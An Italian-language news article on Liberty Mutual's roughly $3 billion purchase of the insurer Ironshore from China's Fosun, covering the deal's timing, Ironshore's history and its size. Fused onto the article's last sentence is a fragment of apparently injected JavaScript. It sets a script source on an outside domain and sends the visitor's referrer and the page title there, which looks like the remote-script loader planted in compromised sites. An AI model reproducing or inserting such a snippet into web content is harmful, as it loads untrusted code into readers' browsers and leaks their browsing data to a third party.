Liberty Mutual acquista Ironshore dalla cinese Fosun per circa $3 miliardi

Liberty Mutual Insurance ha annunciato di aver raggiunto l’accordo con il colosso cinese Fosun International Limited, per acquistare il 100% di Ironshore Inc.

Per chiudere l’operazione, il gruppo assicurativo americano ha messo sul piatto circa 3 miliardi di dollari.

Solamente due anni fa, Fosun aveva speso 2,3 miliardi di dollari per entrare in possesso di Ironshore, impresa di assicurazioni che opera sui mercati di 15 Paesi del mondo e conta su tre hub operativi: Stati Uniti, Bermuda e Regno Unito.

La transazione dovrebbe essere completata entro la prima metà del 2017, una volta ottenute le necessarie autorizzazioni dalle autorità competenti.

Ironshore continuerà a operare con lo stesso brand e sotto la guida dell’attuale team di gestione, ma all’interno del perimetro di Liberty Mutual che punta in modo particolare a far crescere le linee specialty.

Ironshore è stata fondata nel 2006 e a fine 2015 poteva contare su una raccolta premi ante imposte di 2,2 miliardi di dollari e una forza lavoro di circa 800 persone.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;